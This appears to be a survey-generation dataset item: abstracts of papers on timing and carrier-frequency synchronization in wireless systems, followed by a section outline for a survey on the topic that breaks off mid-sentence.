effective interference suppression. The proposed method has been successfully implemented on System-on-Chip consisting of multi-core DSP and ARM microprocessors and verified that it successfully suppresses interference in real time. --- paper_title: Robust carrier frequency offset and channel estimation for orthogonal frequency division multiple access downlink systems in the presence of severe adjacent-cell interference paper_content: This study investigates joint estimation carrier frequency offset (CFO) and channel impulse response (CIR) in the problematic orthogonal frequency division multiple access (OFDMA) downlink scenario at the cell boundary, where a maximum supposition of three adjacent base stations preambles can be received. A novel scheme is proposed for estimating the CFOs and CIRs of different cells. First, the highly efficient joint maximum-likelihood (JML) algorithm is used to enable robust CFO estimation by exploiting the idempotent property of the projection matrix. Next, in order to estimate the precise CIR, the composite CFO-based and circularly shifted preamble signatures are proposed by applying the constrained minimum variance (CMV) algorithm to suppress adjacent-cell interference. Finally, the CFO and CIR estimations are enhanced by an iterative cancellation scheme. To the best of the authors research, there is no publication study proposed joint JML-CFO and CMV-CIR estimators for OFDMA downlink systems with adjacent-cell interference. Simulation results show that the proposed algorithms provide better performance than the conventional estimators and approach the theoretical Cramer–Rao lower bound at the cell boundary over frequency-selective fading channels. --- paper_title: Synchronization, Channel Estimation, and Equalization in MB-OFDM Systems paper_content: This paper addresses preamble-based low complexity synchronization, channel estimation and equalization for Zero-padded (ZP) MB-OFDM based UWB systems. The proposed synchronization method consists of sync detection, coarse timing estimation, fine timing estimation, and oscillator frequency offset estimation. The distinctive features of MB-OFDM systems and the interplay between the timing and carrier frequency hopping at the receiver are judiciously incorporated in the proposed synchronization method. In order to apply the low complexity one-tap frequency-domain equalizer, the required circular convolution property of the received signal is obtained by means of an overlap-add method after the frequency offset compensation. The proposed low complexity channel estimator for each band is developed by first averaging the over-lapadded received preamble symbols within the same band and then applying time-domain least-squares method followed by the discrete Fourier transform. We develop an MMSE equalizer and its approximate version with low complexity. We also derive the probability density functions of the UWB channel path delays, and using them we present several optimization criteria for our proposed synchronization, channel estimation, and equalization. The effectiveness of our proposed methods and optimization criteria are confirmed by computer simulation results. --- paper_title: Training-Based Synchronization and Demodulation With Low Complexity for UWB Signals paper_content: In this paper, we propose a low-complexity data-aided (DA) synchronization and efficient demodulation technique for an ultrawideband (UWB) impulse radio system. Depending on the autocorrelation property of a judiciously chosen training sequence, a redundance-included demodulation template (RDT) can be extracted from the received signal by separating, shifting, and realigning two connected portions in the observation window. After constructing the RDT, two receiver designs are available. One approach is to demodulate transmitted symbols by correlating the RDT in a straightforward manner, which does not require the explicit timing acquisition and, thus, considerably reduces the complexity of the receiver. An alternative approach is accomplished with the assistance of a non-RDT (NRDT). The NRDT-based receiver is able to remove the redundant noisy component of the RDT by acquiring timing offset via a simple synchronization scheme, therefore achieving a better bit error rate (BER) performance. Both the schemes can counteract the effects of interframe interference (IFI) and unknown multipath channels. Furthermore, analytical performance evaluations of the RDT- and NRDT-based receivers are provided. Simulations verify the realistic performance of the proposed receivers in the presence of multiuser interference (MUI) and timing errors. --- paper_title: A generalized RAKE receiver for interference suppression paper_content: Currently, a global third-generation cellular system based on code-division multiple-access (CDMA) is being developed with a wider bandwidth than existing second-generation systems. The wider bandwidth provides increased multipath resolution in a time-dispersive channel, leading to higher frequency-selectivity. A generalized RAKE receiver for interference suppression and multipath mitigation is proposed. The receiver exploits the fact that time dispersion significantly distorts the interference spectrum from each base station in the downlink of a wideband CDMA system. Compared to the conventional RAKE receiver, this generalized RAKE receiver may have more fingers and different combining weights. The weights are derived from a maximum likelihood formulation, modeling the intracell interference as colored Gaussian noise. This low-complexity detector is especially useful for systems with orthogonal downlink spreading codes, as orthogonality between own cell signals cannot be maintained in a frequency-selective channel. The performance of the proposed receiver is quantified via analysis and simulation for different dispersive channels, including Rayleigh fading channels. Gains on the order of 1-3.5 dB are achieved, depending on the dispersiveness of the channel, with only a modest increase in the number of fingers. For a wideband CDMA (WCDMA) system and a realistic mobile radio channel, this translates to capacity gains of the order of 100%. --- paper_title: Traffic-reduced precise ranging protocol for asynchronous UWB positioning networks paper_content: This letter proposes a precise two-way ranging (TWR) protocol toward low traffic for asynchronous UWB positioning networks. The proposed TWR protocol pursuing instantaneous ranging update enables the estimation of clock frequency offset to achieve high ranging accuracy. Theoretical analysis and simulation results verify the performance. --- paper_title: Robust, Low-Complexity, and Energy Efficient Downlink Baseband Receiver Design for MB-OFDM UWB System paper_content: This paper presents optimized synchronization algorithms and architecture designs of a downlink baseband receiver for multiband orthogonal frequency division multiplexing ultra wideband (MB-OFDM UWB). The receiver system targets at low complexity and low power under the premise of good performance. At algorithm level, dual-threshold (DT) detection method is proposed for robust detection performance in timing synchronization; multipartite table method (MTM) is employed to implement arctangent and sin/cos functions in coarse frequency synchronization. MTM outperforms other state-of-the-art methods in power and area. A highly simplified phase tracking method is proposed with better performance in fine frequency synchronization. At architecture level, we focus on optimizing matched filter of packet detector, carrier frequency offset (CFO) corrector and FFT output reorder buffer. The proposed downlink baseband receiver is implemented with 0.13 /mi CMOS technology. The core area of layout is 2.66 × 0.94 mm2, which saves 45.1% hardware cost due to the low-complexity synchronization algorithms and architecture optimization. The postlayout power consumption is 170 mW at 132 MHz clock frequency, which is equivalent to 88 pJ/b energy efficiency at 480 Mbps data rate. --- paper_title: Blind frequency-offset tracking scheme for multiband orthogonal frequency division multiplexing using time-domain spreading paper_content: A blind scheme for estimating the residual carrier-frequency offset of multiband orthogonal frequency division multiplexing (MB-OFDM)-based ultra-wideband (UWB) systems is proposed. In the MB-OFDM UWB system, time-domain spreading (TDS) is used by transmitting the same information across two adjacent OFDM symbols. By using the TDS structure, the proposed frequency estimation scheme does not require the use of pilot symbols. To demonstrate the usefulness of the proposed estimator, analytical expression of the mean square error is derived and the performance is compared with a conventional pilot-assisted estimator. --- paper_title: Data-Aided Timing Synchronization for FM-DCSK UWB Communication Systems paper_content: Frequency-modulated differential chaos shift keying (FM-DCSK) ultrawideband (UWB) communication systems convey information by transmitting ultrashort chaotic pulses (in the nanosecond scale). Since such pulses are ultrashort, timing offset may severely degrade the bit error rate (BER) performance. In this paper, a fast data-aided timing synchronization algorithm with low complexity is proposed for FM-DCSK UWB systems, which capitalizes on the excellent correlation characteristic of chaotic signals. Simulation results show that the BER performance of such systems is fairly close to that of perfect timing thanks to the proposed new algorithm. Moreover, the new algorithm requires less synchronization searching time and lower computational complexity than the conventional one for transmitted reference UWB systems existing in the current literature. --- paper_title: Improved fine CFO synchronization for MB-OFDM UWB paper_content: Proposed is an improved blind carrier frequency offset (CFO) estimator suitable for Multi-Band OFDM Ultra Wideband (MB-OFDM UWB) system. By exploiting the conjugate symmetry of the physical layer convergence protocol (PLCP) the need for training symbols can be avoided and estimation performance is improved as well. Computer simulations show that the proposed method achieves better estimation performance than existing method. --- paper_title: Schmidl-Cox-like Frequency Offset Estimation in Time-Hopping UWB paper_content: This paper presents a time hopping ultra wide band (TH-UWB) receiver design targeted to high performance and low complexity. The classical Schmidl and Cox idea of extracting the frequency offset from the phase of a correlation measure between two identical transmitted signals is here extended to a TH format. The algorithm exploits the low duty cycle of the time hopping access, and combines received samples in order to strengthen the signal-to-noise ratio. A clever selection of which samples to use in the correlation measure (first and last third of the received signal) is proved to perform 0.5 dB from the Cramer-Rao lower bound, thus providing an improvement of 0.75 dB with respect to the standard approach of the literature (correlating the first and second halves of the received signal). A modified algorithm that suitably weights received samples is also proposed for achieving robustness in impulsive multiple user access scenarios. --- paper_title: Ultrawideband radio design: the promise of high-speed, short-range wireless connectivity paper_content: The paper provides a tutorial overview of ultrawideband (UWB) radio technology for high-speed wireless connectivity. Subsequent to establishing a historical and technological context, it describes the new impetus for UWB systems development and standardization resulting from the FCC's recent decision to permit unlicensed operation in the 3.1-10.6 GHz band subject to modified Part 15 rules and indicates the potential new applications that may result. Thereafter, the paper provides a system architect's perspectives on the various issues and challenges involved in the design of link layer subsystems. Specifically, we outline current developments in UWB system design concepts that are oriented to high-speed applications and describe some of the design tradeoffs involved. --- paper_title: Maximum Likelihood Frequency Offset Estimation in Multiple Access Time-Hopping UWB paper_content: Frequency offset estimation for time-hopping (TH) ultra-wide-band (UWB) is addressed in the literature by relying on an AWGN assumption and by exploiting a periodic preamble appended to each packet. In this paper we generalize these techniques with two aims. First, we identify a solution which does not rely on any periodic structure, but can be implemented with a generic TH format. Second, we identify a solution which is robust to multiple access interference (MAI) by assuming a Gaussian mixture (GM) model for MAI. In fact, GMs have recently been identified as good descriptors of UWB interference, and they provide closed form and limited complexity results. With these ideas in mind, we build a data aided maximum likelihood (ML) estimator. The proposed ML solution shows quasi optimum performance in the Cramer-Rao bound sense, and proves to be robust in meaningful multiple user scenarios. --- paper_title: Resource Efficient Implementation of Low Power MB-OFDM PHY Baseband Modem With Highly Parallel Architecture paper_content: The multi-band orthogonal frequency-division multiplexing modem needs to process large amount of computations in short time for support of high data rates, i.e., up to 480 Mbps. In order to satisfy the performance requirement while reducing power consumption, a multi-way parallel architecture has been proposed. But the use of the high degree parallel architecture would increase chip resource significantly, thus a resource efficient design is essential. In this paper, we introduce several novel optimization techniques for resource efficient implementation of the baseband modem which has highly, i.e., 8-way, parallel architecture, such as new processing structures for a (de)interleaver and a packet synchronizer and algorithm reconstruction for a carrier frequency offset compensator. Also, we describe how to efficiently design several other components. The detailed analysis shows that our optimization technique could reduce the gate count by 27.6% on average, while none of techniques degraded the overall system performance. With 0.18-μm CMOS process, the gate count and power consumption of the entire baseband modem were about 785 kgates and less than 381 mW at 66 MHz clock rate, respectively. --- paper_title: Maximum Likelihood Frequency Estimation and Preamble Identification in OFDMA-based WiMAX Systems paper_content: In multi-cellular WiMAX systems based on orthogonal frequency-division multiple-access (OFDMA), the training preamble is chosen from a set of known sequences so as to univocally identify the transmitting base station. Therefore, in addition to timing and frequency synchronization, preamble index identification is another fundamental task that a mobile terminal must successfully complete before establishing a communication link with the base station. In this work we investigate the joint maximum likelihood (ML) estimation of the carrier frequency offset (CFO) and preamble index in a multicarrier system compliant with the WiMAX specifications, and derive a novel expression of the relevant Cramer-Rao bound (CRB). Since the exact ML solution is prohibitively complex in its general formulation, suboptimal algorithms are developed which can provide a reasonable trade-off between estimation accuracy and processing load. Specifically, we show that the fractional CFO can be recovered by combining the ML estimator with an existing algorithm that attains the CRB in all practical scenarios. The integral CFO and preamble index are subsequently retrieved by a suitable approximation of their joint ML estimator. Compared to existing alternatives, the resulting scheme exhibits improved accuracy and reduced sensitivity to residual timing errors. The price for these advantages is a certain increase of the system complexity. --- paper_title: Improved frequency offset estimation scheme for UWB systems with cyclic delay diversity paper_content: This paper proposes an improved pilot-based algorithm for joint estimation of carrier frequency offset (CFO) and sampling frequency offset (SFO) in ultrawideband orthogonal frequency division multiplexing (UWB-OFDM) systems with cyclic delay diversity. By proper selection of cyclic delay time and a frequency band with maximum channel power, a joint estimation of CFO and SFO is derived. Via computer simulation and analysis, the proposed frequency estimator is shown to benefit from the properly selected delay parameter and frequency band. --- paper_title: Ultra-Wideband TOA Estimation in the Presence of Clock Frequency Offset paper_content: The paper is concerned with the impact of clock frequency offsets on the accuracy of ranging systems based on time of arrival (TOA) measurements. It is shown that large TOA errors are incurred if the transmitter and receiver clocks are mistuned by more than just one part per million (ppm). This represents a serious obstacle to the use of commercial low-cost quartz oscillators, as they exhibit frequency drifts in the range of ± 10 ppm and more. A solution is to estimate first the transmitter clock frequency relative to the receiver's and then compensate for the difference by acting on the receiver clock tuning. An algorithm is proposed that estimates the transmitter clock frequency with an accuracy better than 0.1 ppm. Computer simulations indicate that its use in ranging systems makes TOA measurements as good as those obtained with perfectly synchronous clocks. --- paper_title: Receiver Design for Single-Frequency Networks with Fast-Varying Channels paper_content: SC-FDE (Single Carrier Frequency-Domain Equalization) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper we consider the use of SC-FDE schemes in broadcast and multicast systems with SFN (Single Frequency Network) operation where we do not have perfect carrier synchronization between different transmitters. We study the impact of different CFO (Carrier Frequency Offset) between the local oscillator at the receiver and the local oscillator at each transmitter. We also propose receiver structures able to reduce the performance degradation caused by different CFO at different transmitters. Our receivers can be regarded as modified turbo equalizer implemented in the frequency-domain, where a frequency offset compensation is performed before the iterative receiver. --- paper_title: A Synchronization Design for UWB-Based Wireless Multimedia Systems paper_content: Multi-band orthogonal frequency-division multiplexing (MB-OFDM) ultra-wideband (UWB) technology offers large throughput, low latency and has been adopted in wireless audio/video (AV) network products. The complexity and power consumption, however, are still major hurdles for the technology to be widely adopted. In this paper, we propose a unified synchronizer design targeted for MB-OFDM transceiver that achieves high performance with low implementation complexity. The key component of the proposed synchronizer is a parallel auto-correlator structure in which multiple ACF units are instantiated and their outputs are shared by functional blocks in the synchronizer, including preamble signal detection, time-frequency code identification, symbol timing, carrier frequency offset estimation and frame synchronization. This common structure not only reduces the hardware cost but also minimizes the number of operations in the functional blocks in the synchronizer as the results of a large portion of computation can be shared among different functional blocks. To mitigate the effect of narrowband interference (NBI) on UWB systems, we also propose a low-complexity ACF-based frequency detector to facilitate the design of (adaptive) notch filter in analog/digital domain. The theoretical analysis and simulation show that the performance of the proposed design is close to optimal, while the complexity is significantly reduced compared to existing work. --- paper_title: Beamforming Based Receiver Scheme for DVB-T2 System in High Speed Train Environment paper_content: In this paper, the received signal from the different base stations (BSs) of the second generation of Terrestrial Digital Video Broadcasting (DVB-T2) in the high-speed-train (HST) scenario is modeled as a fast time-varying signal with the multiple Doppler frequency offsets. The interference caused by the multiple Doppler frequency offsets and the channel variations, and the signal to interference plus noise ratio of the received signal, are derived for the DVB-T2 receiver. The results of the theoretical analysis show that the interference greatly degraded the performance of the DVB-T2 system. To suppress the interference, we proposed a beamforming based receiver scheme for DVB-T2 system. By using the new signal processing scheme for the received signal vector from the antenna array, one can separate the received signal with the multiple Doppler frequency offsets into the multiple signals, each of which is with a single Doppler frequency offset. The separated signals are compensated by the corresponding Doppler frequency offsets and equalized by the estimated channel responses respectively, then combined into a signal to be demodulated. The results of the simulation show that the proposed scheme can effectively suppress the interference and greatly improve the performance of the DVB-T2 system in the HST environment. --- paper_title: Iterative Sampling Frequency Offset Estimation for MB-OFDM UWB Systems With Long Transmission Packet paper_content: A multiband orthogonal frequency-division multiplexing (MB-OFDM) system, which is one of the effective modulation techniques that have been adopted for high-speed ultrawideband (UWB) systems, is very sensitive to sampling frequency offset (SFO) due to the mismatch between local oscillators at the transmitter and the receiver. In this paper, we propose an iterative SFO estimation method for a high-data-rate MB-OFDM UWB system to improve its SFO estimation accuracy in the case of a long transmission packet. The proposed method is an iterative process of 2-D SFO estimation across pilot subcarriers and consecutive OFDM symbols, together with joint channel estimation. Furthermore, we derive the Cramer-Rao lower bound (CRLB) for the proposed SFO estimation method. This CRLB can be used as a guide for algorithm design and to explore the theoretical limit. Our performance analysis and simulation results show that the proposed iterative SFO estimation method is both practical and effective. --- paper_title: Signal Design for Reduced Complexity and Accurate Cell Search/Synchronization in OFDM-Based Cellular Systems paper_content: This paper proposes a variant of the frequency-domain synchronization structure specified in the long-term evolution (LTE) standard. In the proposed scheme, the primary synchronization signal used in step-1 cell search is the concatenation of a Zadoff-Chu (ZC) sequence and its conjugate (as opposed to only the ZC sequence in LTE). For step-2 cell search, we propose a complex scrambling sequence requiring no descrambling and a new remapped short secondary synchronization signal that randomizes the intercell interference (as opposed to the first/second scrambling sequence and swapped short signals in LTE). Through a combination of analysis and simulation, we demonstrate that the proposed synchronization signals lead to lower searcher complexity than LTE, a lower detection error rate, a shorter mean cell search time, and immunity toward a frequency offset. --- paper_title: A Subspace-Based Two-Way Ranging System Using a Chirp Spread Spectrum Modem, Robust to Frequency Offset paper_content: Herein, we propose and implement a subspace-based two-way ranging system for high resolution indoor ranging that is robust to frequency offset. Due to the frequency offset between wireless nodes, issues about sampling frequency offset (SFO) and carrier frequency offset (CFO) arise in range estimation. Although the problem of SFO is resolved by adopting the symmetric double-sided two-way ranging (SDS-TWR) protocol, the CFO of the received signals impacts the time-of-arrival (TOA) estimation, obtained by conventional subspace-based algorithms such as ESPRIT and MUSIC. Nevertheless, the CFO issue has not been considered with subspace-based TOA estimation algorithms.Our proposed subspace-based algorithm, developed for the robust TOA estimation to CFO, is based on the chirp spread spectrum (CSS) signals. Our subspace-based ranging system is implemented in FPGA with CSS modem using a hardware/software co-design methodology. Simulations and experimental results show that the proposed method can achieve robust ranging between the CSS nodes in an indoor environment with frequency offset. --- paper_title: Frequency-division spread-spectrum makes frequency synchronisation easy paper_content: Frequency division spread spectrum system (FD/S3) has been recently proposed, which uses frequency domain spreading codes and can allow frequency offsets between users. Motivated by the conventional time-domain code acquisition, we propose a frequency (F)-domain code acquisition method using time (T)-domain integrator, which permits frequency offset, which leads to a new T-domain code acquisition using F-domain integrator. Recently proposed Gabor division (GD)/S3 system permits us to use both F- and T-domain code acquisitions separately and cooperatively*. --- paper_title: Self-encoded multi-carrier spread spectrum with iterative despreading for random residual frequency offset paper_content: In this study, we investigate the multi-carrier spread spectrum (MCSS) communication system which adopts the self-encoded spread spectrum in a downlink synchronous channel. It is very difficult to completely eliminate the frequency offset in practical channel scenarios. We demonstrate that the self-encoded MCSS (SE-MCSS) with iterative despreading manifests a remarkable immunity to residual frequency offset. The SE-MCSS can be an excellent candidate for the future generation of wireless services. --- paper_title: A Fast Time-Delay Estimator of PN Signals paper_content: This work proposes an effective time-delay estimator for PN satellite signals, exploiting a fast triangular interpolator, running on three estimated ambiguity samples in the neighborhood of the coarse estimate. Performance analysis (theory and simulation) is carried out in comparison with conventional approaches based on the interpolation, usually carried out by (time-consuming) narrow-band over-sampling or (fast) fitting of few samples of a smoothed function of the ambiguity function around its maximum. The theoretical results, substantiated by computer simulations, have evidenced that the devised method outperforms the conventional estimator for all the timing offsets and is well suited for satellite spread-spectrum communications. --- paper_title: Gabor Division/Spread Spectrum System Is Separable in Time and Frequency Synchronization paper_content: Recently proposed new Time-Domain (TD) synchronization using frequency integration and TD Spread Spectrum (SS) codes has been shown to be robust to frequency offset, that has its dual Frequency-Domain (FD) synchronization using time integration and FD SS codes which is robust to timing offset. Separable Property (SP) is defined for time-frequency synchronization under the condition containing time and frequency deviations to be performed separately and cooperatively. The SP compels us to design phase correction on SS codes and transmitted data. --- paper_title: Wireless Networks With RF Energy Harvesting: A Contemporary Survey paper_content: Radio frequency (RF) energy transfer and harvesting techniques have recently become alternative methods to power the next generation wireless networks. As this emerging technology enables proactive energy replenishment of wireless devices, it is advantageous in supporting applications with quality of service (QoS) requirement. In this paper, we present an extensive literature review on the research progresses in wireless networks with RF energy harvesting capability, referred to as RF energy harvesting networks (RF-EHNs). First, we present an overview of the RF-EHNs including system architecture, RF energy harvesting techniques and existing applications. Then, we present the background in circuit design as well as the state-of-the-art circuitry implementations, and review the communication protocols specially designed for RF-EHNs. We also explore various key design issues in the development of RF-EHNs according to the network types, i.e., single-hop network, multi-antenna network, relay network and cognitive radio network. Finally, we envision some open research directions. --- paper_title: Relaying Protocols for Wireless Energy Harvesting and Information Processing paper_content: An emerging solution for prolonging the lifetime of energy constrained relay nodes in wireless networks is to avail the ambient radio-frequency (RF) signal and to simultaneously harvest energy and process information. In this paper, an amplify-and-forward (AF) relaying network is considered, where an energy constrained relay node harvests energy from the received RF signal and uses that harvested energy to forward the source information to the destination. Based on the time switching and power splitting receiver architectures, two relaying protocols, namely, i) time switching-based relaying (TSR) protocol and ii) power splitting-based relaying (PSR) protocol are proposed to enable energy harvesting and information processing at the relay. In order to determine the throughput, analytical expressions for the outage probability and the ergodic capacity are derived for delay-limited and delay-tolerant transmission modes, respectively. The numerical analysis provides practical insights into the effect of various system parameters, such as energy harvesting time, power splitting ratio, source transmission rate, source to relay distance, noise power, and energy harvesting efficiency, on the performance of wireless energy harvesting and information processing using AF relay nodes. In particular, the TSR protocol outperforms the PSR protocol in terms of throughput at relatively low signal-to-noise-ratios and high transmission rate. --- paper_title: Noncooperative Cellular Wireless with Unlimited Numbers of Base Station Antennas paper_content: A cellular base station serves a multiplicity of single-antenna terminals over the same time-frequency interval. Time-division duplex operation combined with reverse-link pilots enables the base station to estimate the reciprocal forward- and reverse-link channels. The conjugate-transpose of the channel estimates are used as a linear precoder and combiner respectively on the forward and reverse links. Propagation, unknown to both terminals and base station, comprises fast fading, log-normal shadow fading, and geometric attenuation. In the limit of an infinite number of antennas a complete multi-cellular analysis, which accounts for inter-cellular interference and the overhead and errors associated with channel-state information, yields a number of mathematically exact conclusions and points to a desirable direction towards which cellular wireless could evolve. In particular the effects of uncorrelated noise and fast fading vanish, throughput and the number of terminals are independent of the size of the cells, spectral efficiency is independent of bandwidth, and the required transmitted energy per bit vanishes. The only remaining impairment is inter-cellular interference caused by re-use of the pilot sequences in other cells (pilot contamination) which does not vanish with unlimited number of antennas. --- paper_title: In-Band Full-Duplex Relaying: A Survey, Research Issues and Challenges paper_content: Recent advances in self-interference cancellation techniques enable in-band full-duplex wireless systems, which transmit and receive simultaneously in the same frequency band with high spectrum efficiency. As a typical application of in-band full-duplex wireless, in-band full-duplex relaying (FDR) is a promising technology to integrate the merits of in-band full-duplex wireless and relaying technology. However, several significant research challenges remain to be addressed before its widespread deployment, including small-size full-duplex device design, channel modeling and estimation, cross-layer/joint resource management, interference management, security, etc. In this paper, we provide a brief survey on some of the works that have already been done for in-band FDR, and discuss the related research issues and challenges. We identify several important aspects of in-band FDR: basics, enabling technologies, information-theoretical performance analysis, key design issues and challenges. Finally, we also explore some broader perspectives for in-band FDR. --- paper_title: Frequency synchronization and phase offset tracking in a real-time 60-GHz CS-OFDM MIMO system paper_content: The performance of an Orthogonal Frequency-Division-Multiplexing (OFDM)-based 60-GHz system can be strongly degraded due to carrier frequency impairment and Phase Noise (PN). In this paper we present a practical approach to the design of a frequency synchronization and phase offset tracking scheme for a 60-GHz, Non-Line-of-Sight (NLOS) capable wireless communication system. We first analyse the architecture of the 60-GHz system and propose a simple algorithm for Carrier Frequency Offset (CFO) estimation on the basis of numerical investigations. Then, we explore pilot based and blind tracking methods for mitigation of Residual Frequency Offset (RFO) and Common Phase Error (CPE). Provided are also analysis and implementation results on an Altera Startix III FPGA. --- paper_title: MIMO Broadcasting for Simultaneous Wireless Information and Power Transfer paper_content: Wireless power transfer (WPT) is a promising new solution to provide convenient and perpetual energy supplies to wireless networks. In practice, WPT is implementable by various technologies such as inductive coupling, magnetic resonate coupling, and electromagnetic (EM) radiation, for short-/mid-/long-range applications, respectively. In this paper, we consider the EM or radio signal enabled WPT in particular. Since radio signals can carry energy as well as information at the same time, a unified study on simultaneous wireless information and power transfer (SWIPT) is pursued. Specifically, this paper studies a multiple-input multiple-output (MIMO) wireless broadcast system consisting of three nodes, where one receiver harvests energy and another receiver decodes information separately from the signals sent by a common transmitter, and all the transmitter and receivers may be equipped with multiple antennas. Two scenarios are examined, in which the information receiver and energy receiver are separated and see different MIMO channels from the transmitter, or co-located and see the identical MIMO channel from the transmitter. For the case of separated receivers, we derive the optimal transmission strategy to achieve different tradeoffs for maximal information rate versus energy transfer, which are characterized by the boundary of a so-called rate-energy (R-E) region. For the case of co-located receivers, we show an outer bound for the achievable R-E region due to the potential limitation that practical energy harvesting receivers are not yet able to decode information directly. Under this constraint, we investigate two practical designs for the co-located receiver case, namely time switching and power splitting, and characterize their achievable R-E regions in comparison to the outer bound. --- paper_title: Improving Bandwidth Efficiency in E-band Communication Systems paper_content: The allocation of a large amount of bandwidth by regulating bodies in the 70/80 GHz band, that is, the E-band, has opened up new potentials and challenges for providing affordable and reliable gigabit-per-second wireless point-to-point links. This article first reviews the available bandwidth and licensing regulations in the E-band. Subsequently, different propagation models (e.g., the ITU-R and Cane models) are compared against measurement results, and it is concluded that to meet specific availability requirements, E-band wireless systems may need to be designed with larger fade margins compared to microwave systems. A similar comparison is carried out between measurements and models for oscillator phase noise. It is confirmed that phase noise characteristics, which are neglected by the models used for narrowband systems, need to be taken into account for the wideband systems deployed in the E-band. Next, a new MIMO transceiver design, termed continuous aperture phased (CAP)-MIMO, is presented. Simulations show that CAP-MIMO enables E-band systems to achieve fiber-optic-like throughputs. Finally, it is argued that full-duplex relaying can be used to greatly enhance the coverage of E-band systems without sacrificing throughput, thus facilitating their application in establishing the backhaul of heterogeneous networks. --- paper_title: In-Band Full-Duplex Wireless: Challenges and Opportunities paper_content: In-band full-duplex (IBFD) operation has emerged as an attractive solution for increasing the throughput of wireless communication systems and networks. With IBFD, a wireless terminal is allowed to transmit and receive simultaneously in the same frequency band. This tutorial paper reviews the main concepts of IBFD wireless. One of the biggest practical impediments to IBFD operation is the presence of self-interference, i.e., the interference that the modem's transmitter causes to its own receiver. This tutorial surveys a wide range of IBFD self-interference mitigation techniques. Also discussed are numerous other research challenges and opportunities in the design and analysis of IBFD wireless systems. --- paper_title: Enhanced List-based Group-wise overloaded receiver with application to satellite reception paper_content: The market trends towards the use of smaller dish antennas for TV satellite receivers, as well as the growing density of broadcasting satellites in orbit require the application of robust adjacent satellite interference (ASI) cancellation algorithms at the receivers. The wider beamwidth of a small size dish and the growing number of satellites in orbit impose an overloaded scenario, i.e., a scenario where the number of transmitting satellites exceeds the number of receiving antennas. For such a scenario, we present a two stage receiver to enhance signal detection from the satellite of interest, i.e., the satellite that the dish is pointing to, while reducing interference from neighboring satellites. Towards this objective, we propose an enhanced List-based Group-wise Search Detection (LGSD) receiver architecture that takes into account the spatially correlated additive noise and uses the signal-to-interference-plus-noise ratio (SINR) maximization criterion to improve detection performance. Simulations show that the proposed receiver structure enhances the performance of satellite systems in the presence of ASI when compared to existing methods. --- paper_title: Heterogeneous Vehicular Networking: A Survey on Architecture, Challenges, and Solutions paper_content: With the rapid development of the Intelligent Transportation System (ITS), vehicular communication networks have been widely studied in recent years. Dedicated Short Range Communication (DSRC) can provide efficient real-time information exchange among vehicles without the need of pervasive roadside communication infrastructure. Although mobile cellular networks are capable of providing wide coverage for vehicular users, the requirements of services that require stringent real-time safety cannot always be guaranteed by cellular networks. Therefore, the Heterogeneous Vehicular NETwork (HetVNET), which integrates cellular networks with DSRC, is a potential solution for meeting the communication requirements of the ITS. Although there are a plethora of reported studies on either DSRC or cellular networks, joint research of these two areas is still at its infancy. This paper provides a comprehensive survey on recent wireless networks techniques applied to HetVNETs. Firstly, the requirements and use cases of safety and non-safety services are summarized and compared. Consequently, a HetVNET framework that utilizes a variety of wireless networking techniques is presented, followed by the descriptions of various applications for some typical scenarios. Building such HetVNETs requires a deep understanding of heterogeneity and its associated challenges. Thus, major challenges and solutions that are related to both the Medium Access Control (MAC) and network layers in HetVNETs are studied and discussed in detail. Finally, we outline open issues that help to identify new research directions in HetVNETs. --- paper_title: Spectrum Sensing of OFDM Signals in the Presence of Carrier Frequency Offset paper_content: This paper addresses the important issue of detecting orthogonal frequency-division multiplexing (OFDM) signals in the presence of carrier frequency offset (CFO). The proposed algorithm utilizes the characteristics of the covariance matrix of the discrete Fourier transform of the input signal to the detector to determine the presence of the primary user's signal. This algorithm can be exploited to differentiate OFDM signals from the noise through the proposal of a new decision metric, which measures the off-diagonal elements of the input signal's covariance matrix. The decision threshold subject to a given probability of false alarm is derived, whereas performance analysis is carried out to demonstrate the potential of the proposed algorithm. Finally, simulation results are presented to validate the effectiveness of the proposed sensing method in comparison with other existing approaches. --- paper_title: Digital Baseband IC Design of OFDM PHY for a 60GHz Proximity Communication System paper_content: This paper presents a digital baseband IC design based on OFDM PHY for a 60GHz proximity communication system. We propose a low computational complexity OFDM demodulator with a carrier frequency offset estimation method in polar coordinates suitable for high-speed parallel architecture. The proposed architecture is implemented in 65nm CMOS technology, and is experimentally verified to achieve the PHY data rate above 2.2Gbps. The digital baseband IC includes a complete functionality of OFDM transceiver with error correcting codecs and MAC. --- paper_title: Indoor Millimeter Wave MIMO: Feasibility and Performance paper_content: In this paper, we investigate spatial multiplexing at millimeter (mm) wave carrier frequencies for short-range indoor applications by quantifying fundamental limits in line-of-sight (LOS) environments and then investigating performance in the presence of multipath and LOS blockage. Our contributions are summarized as follows. For linear arrays with constrained form factor, an asymptotic analysis based on the properties of prolate spheroidal wave functions shows that a sparse array producing a spatially uncorrelated channel matrix effectively provides the maximum number of spatial degrees of freedom in a LOS environment, although substantial beamforming gains can be obtained by using denser arrays. This motivates our proposed mm-wave MIMO architecture, which utilizes arrays of subarrays to provide both directivity and spatial multiplexing gains. System performance is evaluated in a simulated indoor environment using a ray-tracing model that incorporates multipath effects and potential LOS blockage. Eigenmode transmission with waterfilling power allocation serves as a performance benchmark, and is compared to the simpler scheme of beamsteering transmission with MMSE reception and a fixed signal constellation. Our numerical results provide insight into the spatial variations of attainable capacity within a room, and the combinations of beamsteering and spatial multiplexing used in different scenarios. ---
Title: Timing and Carrier Synchronization in Wireless Communication Systems: A Survey and Classification of Research in the Last Five Years Section 1: INTRODUCTION Description 1: Write about the motivation, background, scope, and methodology of the survey, as well as the organization of the paper. Section 2: SISO SYSTEMS Description 2: Discuss the system model, synchronization challenges, literature review, and summary of timing and carrier synchronization in single-input single-output (SISO) systems. Section 3: MULTI-ANTENNA SYSTEMS Description 3: Explore the system model, synchronization challenges, literature review, and summary of timing and carrier synchronization in multi-antenna systems, including single-carrier and multi-carrier systems. Section 4: COOPERATIVE RELAYING Description 4: Review the system model, synchronization challenges, literature review, and summary of timing and carrier synchronization in cooperative relaying systems, distinguishing between decode-and-forward and amplify-and-forward modes. Section 5: MULTICELL/MULTIUSER COMMUNICATION SYSTEMS Description 5: Analyze the synchronization challenges, literature review, and summary in multiuser/multicell communication systems, including SC-FDMA, OFDMA uplink communication, CDMA communication, cognitive radio-based communication, distributed multiuser communication, CoMP-based communication, and multicell interference-based communication systems. Section 6: UWB AND NON-CDMA BASED SPREAD SPECTRUM COMMUNICATION SYSTEMS Description 6: Detail the system models, synchronization challenges, literature review, and summary for ultra-wideband (UWB) communication systems and 